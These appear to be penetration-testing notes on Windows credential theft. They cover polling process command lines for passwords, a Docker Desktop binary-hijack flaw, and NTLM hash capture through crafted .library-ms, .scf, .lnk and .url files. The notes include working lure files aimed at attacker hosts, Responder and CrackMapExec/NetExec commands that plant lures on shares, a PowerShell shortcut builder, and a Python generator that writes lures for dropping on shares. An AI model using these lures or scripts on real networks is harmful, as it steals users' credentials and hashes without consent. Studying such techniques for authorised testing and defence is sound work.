Traffic Capture
Monitoring for Process Command Lines
procmon.ps1
while($true)
{
    # Snapshot every process command line, wait a second, snapshot again
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    # '=>' marks a command line that appeared between snapshots, '<=' one that went away
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')

InputObject                                                                                      SideIndicator
-----------                                                                                      -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>
@{CommandLine="C:\Windows\system32\cmd.exe" }                                                    =>
@{CommandLine=\??\C:\Windows\system32\conhost.exe 0x4}                                           =>
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd}             =>
@{CommandLine="C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2... <=

The net use line is the one that matters: the sqlsvc account's password is passed in clear text on the command line, where a one-second poll like this picks it up.
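Added example, not code from the original notes: a small Python parser for the Compare-Object output above that keeps only the processes that appeared ('=>' rows) and flags command lines carrying a clear-text password, handling the two places net use accepts one and a generic -p/-P/--password switch. The sample rows are constructed for the example except the net use line, which repeats the capture above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of what procmon.ps1 prints: '=>' rows are processes that appeared
# between the two snapshots, '<=' rows are processes that exited. Only the net use row
# is taken from the capture above; the runas and sqlcmd rows are made up for the example.
SAMPLE_DIFF = r"""
InputObject                                                                   SideIndicator
-----------                                                                   -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>
@{CommandLine="C:\Windows\system32\cmd.exe" }                                 =>
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd} =>
@{CommandLine=runas /user:CORP\admin "cmd /c whoami"}                         =>
@{CommandLine=sqlcmd -S sql02 -U sa -P S3cret! -Q "select 1"}                 =>
@{CommandLine="C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI} <=
"""

ROW_RE = re.compile(r"^@\{CommandLine=(.*)\}\s+(=>|<=)$")

# Switches after which tools commonly take a clear-text secret (psexec -p, sqlcmd -P, ...).
# Heuristic only: '-p' is a port switch for some tools, so review hits by hand.
SECRET_SWITCH_RE = re.compile(
    r"(?:^|\s)(?:-p|--password|/password|password|pwd)[\s:=]+(\S+)", re.IGNORECASE
)


@dataclass
class Finding:
    command: str
    user: Optional[str]
    secret: str


def parse_new_processes(diff_text: str) -> List[str]:
    """Return the command lines of processes that appeared ('=>' rows)."""
    new_cmds = []
    for raw in diff_text.splitlines():
        m = ROW_RE.match(raw.strip())
        if m and m.group(2) == "=>":
            new_cmds.append(m.group(1).strip())
    return new_cmds


def _net_use_secret(tokens: List[str]) -> Tuple[Optional[str], Optional[str]]:
    # net use [drive:] [\\server\share] [password | *] [/user:name] ...
    # The password may follow /user:name or sit right after the share; '*' makes net
    # prompt for it, so nothing leaks. Whitespace splitting is enough here (a quoted
    # password containing spaces is not handled).
    share_idx = next((i for i, t in enumerate(tokens) if t.startswith("\\\\")), None)
    user = secret = None
    for i, tok in enumerate(tokens):
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                secret = tokens[i + 1]          # net use ... /user:name password
            break
    if secret is None and share_idx is not None and share_idx + 1 < len(tokens):
        cand = tokens[share_idx + 1]            # net use drive: \\server\share password ...
        if not cand.startswith("/"):
            secret = cand
    if secret == "*":
        secret = None
    return user, secret


def find_credentials(cmds: List[str]) -> List[Finding]:
    """Flag command lines that carry a clear-text password as an argument."""
    findings = []
    for cmd in cmds:
        tokens = cmd.split()
        if (len(tokens) >= 2 and tokens[0].lower() in ("net", "net.exe", "net1", "net1.exe")
                and tokens[1].lower() == "use"):
            user, secret = _net_use_secret(tokens)
            if secret:
                findings.append(Finding(cmd, user, secret))
            continue
        m = SECRET_SWITCH_RE.search(cmd)
        if m and m.group(1) != "*":
            findings.append(Finding(cmd, None, m.group(1)))
    return findings


if __name__ == "__main__":
    for f in find_credentials(parse_new_processes(SAMPLE_DIFF)):
        print(f"user={f.user!r} secret={f.secret!r} in: {f.command}")
```

The runas row is deliberately left unflagged: runas takes /user: but prompts for the password, so nothing is on the command line to steal.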
Vulnerable Services
Docker Desktop Community Edition before 2.1.0.1
The program looks for docker-credential-wincred.exe and docker-credential-wincred.bat in C:\PROGRAMDATA\DockerDesktop\version-bin\. That directory was misconfigured with full write access for the BUILTIN\Users group, so any authenticated user on the system could write a file into it (such as a malicious executable). An executable placed there runs a) when the Docker application starts and b) when a user authenticates with the command docker login.
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
poc.library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\ATTACKER_IP\SHARE_NAME</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
Once the archive containing the file is extracted, Explorer parses the library description and connects to the UNC path in simpleLocation without the user ever opening the file, sending the NTLM authentication to the attacker host.
SCF on a File Share
@Inventory.scf
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Catch the authentication attempts with Responder listening on the attacker interface:
sudo responder -wrf -v -I tun0
ntlm_theft
ntlm_theft supports the following attack types:
Browse to Folder Containing
.url – via ICONFILE field
.lnk - via icon_location field
.scf – via ICONFILE field (Not Working on Latest Windows)
autorun.inf via OPEN field (Not Working on Latest Windows)
desktop.ini - via IconResource field (Not Working on Latest Windows)
Open Document
.xml – via Microsoft Word external stylesheet
.xml – via Microsoft Word includepicture field
.htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
.docx – via Microsoft Word includepicture field
.docx – via Microsoft Word external template
.docx – via Microsoft Word frameset webSettings
.xlsx - via Microsoft Excel external cell
.wax - via Windows Media Player playlist (Better, primary open)
.asx – via Windows Media Player playlist (Better, primary open)
.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
.jnlp – via Java external jar
.application – via any Browser (Must be served via a browser downloaded or won’t run)
Open Document and Accept Popup
.pdf – via Adobe Acrobat Reader
Click Link in Chat Program
.txt – formatted link to paste into Zoom chat
CME
# scuffy drops an .scf and slinky a .lnk into every share the account can write to; both point the icon at SERVER
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP
Rocabella
LNK File on a File Share
lnkbomb
Generating a Malicious .lnk File
# Build a shortcut whose target is a UNC path on the attacker host; Explorer resolves it
# when it renders the containing folder, producing an SMB authentication attempt.
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"    # '@' sorts the name to the top of the listing
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Netexec
nxc smb IP -u username -p password -d domain.local -M slinky -o NAME=Shortcut SERVER=ATTACKER_IP
Rocabella
URL Files on a File Share
The same attack works with .url files: point IconFile at the attacker host, drop the file on the share and listen with responder -I eth0 -v.
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.10.10\%USERNAME%.icon
IconIndex=1
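Added example, not part of the original notes or of ntlm_theft, CME or Rocabella: a Python generator for the three text-based lures covered above (.library-ms, .scf and .url), plus a parser that pulls the target UNC path back out of a .library-ms, which is handy when triaging one found on a share. The attacker host 10.10.14.3 and share name share are assumptions carried over from the SCF example; the @Inventory base name and the output directory are this example's own choices.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import List, Optional

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def unc(host: str, share: str, name: str = "") -> str:
    """\\\\host\\share[\\name] with single backslashes, as Windows reads it from disk."""
    path = f"\\\\{host}\\{share}"
    return f"{path}\\{name}" if name else path


def library_ms(host: str, share: str) -> str:
    # Explorer resolves simpleLocation as soon as it renders the file (no double-click needed).
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        f'<libraryDescription xmlns="{LIBRARY_NS}">',
        "  <searchConnectorDescriptionList>",
        "    <searchConnectorDescription>",
        "      <simpleLocation>",
        f"        <url>{unc(host, share)}</url>",
        "      </simpleLocation>",
        "    </searchConnectorDescription>",
        "  </searchConnectorDescriptionList>",
        "</libraryDescription>",
    ]
    return "\r\n".join(lines) + "\r\n"


def scf_file(host: str, share: str, icon: str = "legit.ico") -> str:
    # Explorer fetches IconFile when it lists the folder holding the .scf.
    lines = ["[Shell]", "Command=2", f"IconFile={unc(host, share, icon)}",
             "[Taskbar]", "Command=ToggleDesktop"]
    return "\r\n".join(lines) + "\r\n"


def url_file(host: str, share: str) -> str:
    # %USERNAME%.icon: the file name requested from the listener tells you which user browsed.
    lines = ["[InternetShortcut]", "URL=whatever", "WorkingDirectory=whatever",
             f"IconFile={unc(host, share, '%USERNAME%.icon')}", "IconIndex=1"]
    return "\r\n".join(lines) + "\r\n"


def library_ms_target(content: str) -> Optional[str]:
    """Parse a .library-ms and return the simpleLocation URL it points at, if any."""
    root = ET.fromstring(content.encode("utf-8"))
    node = root.find(f".//{{{LIBRARY_NS}}}simpleLocation/{{{LIBRARY_NS}}}url")
    return node.text if node is not None else None


def write_lures(host: str, share: str, out_dir: Optional[str] = None,
                base: str = "@Inventory") -> List[Path]:
    """Write all three lures to out_dir (a fresh temp dir if None) and return their paths.
    The '@' prefix sorts the files to the top of a directory listing so Explorer renders
    them first; copy them to a share the target users browse."""
    out = Path(out_dir or tempfile.mkdtemp())
    files = {
        f"{base}.library-ms": library_ms(host, share),
        f"{base}.scf": scf_file(host, share),
        f"{base}.url": url_file(host, share),
    }
    paths = []
    for name, content in files.items():
        p = out / name
        p.write_bytes(content.encode("utf-8"))  # write_bytes keeps the CRLF line endings intact
        paths.append(p)
    return paths


if __name__ == "__main__":
    for p in write_lures("10.10.14.3", "share"):
        print(p)
```

Whichever lure fires, the listener side is the same as for the SCF case above (Responder on the interface facing the victims); the generator exists only so the three file formats are written consistently rather than by hand.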
Obfuscated Files
Word, ppt, scf, lnk, etc